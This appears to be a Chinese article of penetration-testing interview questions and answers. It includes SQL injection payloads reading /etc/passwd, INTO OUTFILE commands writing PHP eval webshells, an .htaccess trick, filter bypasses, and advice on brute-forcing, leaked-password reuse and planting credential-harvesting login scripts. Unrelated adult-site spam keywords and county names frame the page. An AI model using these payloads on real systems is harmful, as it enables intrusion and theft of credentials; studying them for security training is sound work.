最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

校招護(hù)航|信安滲透測試面試題大全來了

2020-09-27 18:45 作者:匯智知了堂  | 我要投稿

知了姐喊你來刷題啦!要想面試能成功,刷題一定要用功!

特奉上校招沖刺之滲透測試工程師面試題大全,做你的面試助推器!


01.拿到一個待檢測的站,你覺得應(yīng)該先做什么?

收集信息:whois、網(wǎng)站源 IP、旁站、C段網(wǎng)站、服務(wù)器系統(tǒng)版本、容器版本、程序版本、數(shù)據(jù)庫類型、二級域名、防火墻、維護(hù)者信息另說...

02.mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?

5.0以下沒有information_schema這個系統(tǒng)表,無法列表名等,只能暴力跑表名;5.0以下是多用戶單操作,5.0以上是多用戶多操作。

03.在滲透過程中,收集目標(biāo)站注冊人郵箱對我們有什么價值?

(1)丟社工庫里看看有沒有泄露密碼,然后嘗試用泄露的密碼進(jìn)行登錄后臺

(2)用郵箱做關(guān)鍵詞進(jìn)行丟進(jìn)搜索引擎

(3)利用搜索到的關(guān)聯(lián)信息找出其他郵箱進(jìn)而得到常用社交賬號

(4)社工找出社交賬號,里面或許會找出管理員設(shè)置密碼的習(xí)慣

(5)利用已有信息生成專用字典

(6) 觀察管理員常逛哪些非大眾性網(wǎng)站,拿下它,你會得到更多好東西

04.判斷出網(wǎng)站的CMS對滲透有什么意義?

查找網(wǎng)上已曝光的程序漏洞,如果開源,還能下載相對應(yīng)的源碼進(jìn)行代碼審計。

05.一個成熟并且相對安全的CMS,滲透時掃目錄的意義?

(1)敏感文件、二級目錄掃描

(2)站長的誤操作比如:網(wǎng)站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點(diǎn)

06.常見的網(wǎng)站服務(wù)器容器?

IIS、Apache、nginx、Tomcat,weblogic、jboss

07.mysql注入點(diǎn),用工具對目標(biāo)站直接寫入一句話,需要哪些條件?

root權(quán)限以及


網(wǎng)站的絕對路徑

load_file()讀取文件操作

前提:

知道文件的絕對路徑

能夠使用union查詢

對web目錄有寫的權(quán)限

union select 1,load_file('/etc/passwd'),3,4,5#

0x2f6574632f706173737764

union select1 ,

load_file(0x2f6574632f706173737764),3,4,5#

路徑?jīng)]有加單引號的話必須轉(zhuǎn)換十六進(jìn)制

要是想省略單引號的話必須轉(zhuǎn)換十六進(jìn)制

into outfile寫入文件操作

前提:

文件名必須是全路徑(絕對路徑)

用戶必須有寫文件的權(quán)限

沒有對單引號'過濾

select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php'

select '<?php @eval($_POST["admin"]); ?>' into outfile

'C:\Windows\tmp\8.php'

路徑里面兩個反斜杠\可以換成一個正斜杠/

PHP語句沒有單引號的話,必須轉(zhuǎn)換成十六進(jìn)制

要是想省略單引號'的話,必須轉(zhuǎn)換成十六進(jìn)制

<?php eval($_POST["admin"]); ?> 或者 <?php

eval($_GET["admin"]); ?>

<?php @eval($_POST["admin"]); ?>

<?php phpinfo(); ?>

<?php eval($_POST["admin"]); ?>

建議一句話PHP語句轉(zhuǎn)換成十六進(jìn)制

08.目前已知哪些版本的容器有解析漏洞,具體舉例?

(1) IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夾名

(2) IIS 7.0/7.5

默認(rèn)Fast-CGI開啟,直接在url中圖片地址后面輸入/1.php,會把正常圖片當(dāng)成php解析

(3) Nginx

版本小于等于0.8.37,利用方法和IIS 7.0/7.5一樣,F(xiàn)ast-CGI關(guān)閉情況下也可利用。

空字節(jié)代碼 xxx.jpg.php

(4)Apache

上傳的文件命名為:test.php.x1.x2.x3,Apache是從右往左判斷后綴

(5)lighttpd

xx.jpg/xx.php

09.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器?

linux大小寫敏感,windows大小寫不敏感

10.為何一個mysql數(shù)據(jù)庫的站,只有一個80端口開放?

(1)更改了端口,沒有掃描出來

(2) 站庫分離

(3) 3306端口不對外開放

11.3389無法連接的幾種情況?

(1)沒開放3389 端口

(2)端口被修改

(3) 防護(hù)攔截

(4)處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā))

12.如何突破注入時字符被轉(zhuǎn)義?

寬字符注入;hex編碼繞過

13.拿到一個待檢測的站,你覺得應(yīng)該先做什么?

查看編輯器的名稱版本,然后搜索公開的漏洞

14.拿到一個webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件,我們能做什么?

能做的事情很多,用隱藏網(wǎng)馬來舉例子:插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php</FilesMatch>.jpg文件會被解析成.php文件


15.注入漏洞只能查賬號密碼?

可脫褲,可上傳webshell,可執(zhí)行命令

16.安全狗會追蹤變量,從而發(fā)現(xiàn)出是一句話木馬嗎?

是根據(jù)特征碼,所以很好繞過

17.access 掃出后綴為asp的數(shù)據(jù)庫文件,訪問亂碼。如何實(shí)現(xiàn)到本地利用?

迅雷下載,直接改后綴為.mdb

18.提權(quán)時選擇可讀寫目錄,為何盡量不用帶空格的目錄?

因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù)

19.某服務(wù)器有站點(diǎn)A,B 為何在A的后臺添加test用戶,訪問B的后臺。發(fā)現(xiàn)也添加上了test用戶?

同數(shù)據(jù)庫

20.注入時可以不使用and 或or 或xor,直接order by 開始注入嗎?

and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn),如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去

21.某個防注入系統(tǒng),在注入時會提示:統(tǒng)檢測到你有非法注入的行為。已記錄您的ip xx.xx.xx.xx 時間:2016:01-23提交頁面:test.asp?id=15提交內(nèi)容:and 1=1如何利用這個防注入系統(tǒng)拿shell?

在URL里面直接提交一句話,這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫文件了,這個時候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。具體文章參見:

http://ytxiao.lofter.com/post/40583a_ab36540

22.上傳大馬后訪問亂碼時,有哪些解決辦法?

瀏覽器中改編碼

23.審查上傳點(diǎn)的元素有什么意義?

有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時只要增加上傳類型就能突破限制了

24.目標(biāo)站禁止注冊用戶,找回密碼處隨便輸入用戶名提示:“此用戶不存在”,你覺得這里怎樣利用?

先爆破用戶名,再利用被爆破出來的用戶名爆破密碼。


25.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為

http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?

這就任意文件下載漏洞,在file=后面嘗試輸入index.php下載他的首頁文件,

然后在首頁文件里繼續(xù)查找其他網(wǎng)站的配置文件,可以找出網(wǎng)站的數(shù)據(jù)庫密碼和數(shù)據(jù)庫的地址。

26.甲給你一個目標(biāo)站,并且告訴你根目錄下存在/abc/目錄,并且此目錄下存在編輯器和admin目錄。請問你的想法是?

直接在網(wǎng)站二級目錄/abc/下掃描敏感文件及目錄

27.在有shell的情況下,如何使用xss實(shí)現(xiàn)對目標(biāo)站的長久控制?

(1)后臺登錄處加一段記錄登錄賬號密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。(此方法適合有價值并且需要深入控制權(quán)限的網(wǎng)絡(luò))

(2)在登錄后才可以訪問的文件中插入XSS腳本

28.后臺修改管理員密碼處,原密碼顯示為*。你覺得該怎樣實(shí)現(xiàn)讀出這個用戶的密碼?

審查元素 把密碼處的password屬性改成text就明文顯示了

29.目標(biāo)站無防護(hù),上傳圖片可以正常訪問,上傳腳本格式訪問則403.什么原因?

原因很多,有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本,嘗試改后綴名繞過

30.審查元素得知網(wǎng)站所使用的防護(hù)軟件,你覺得怎樣做到的?

在敏感操作被攔截,通過界面信息無法具體判斷是什么防護(hù)的時候,F(xiàn)12看HTML體部 比如護(hù)衛(wèi)神就可以在名稱內(nèi)看到<hws>內(nèi)容<hws>


校招護(hù)航|信安滲透測試面試題大全來了的評論 (共 條)

分享到微博請遵守國家法律
福贡县| 通渭县| 山西省| 海盐县| 福州市| 廊坊市| 平泉县| 绵竹市| 辽阳市| 响水县| 三穗县| 滁州市| 岐山县| 金堂县| 广德县| 邵武市| 康定县| 合江县| 巴彦县| 阜新| 澎湖县| 樟树市| 穆棱市| 晋江市| 滨州市| 名山县| 大兴区| 卫辉市| 日土县| 肇东市| 敦煌市| 遵化市| 昆山市| 韩城市| 板桥市| 左云县| 腾冲县| 会宁县| 凤阳县| 偏关县| 绥阳县|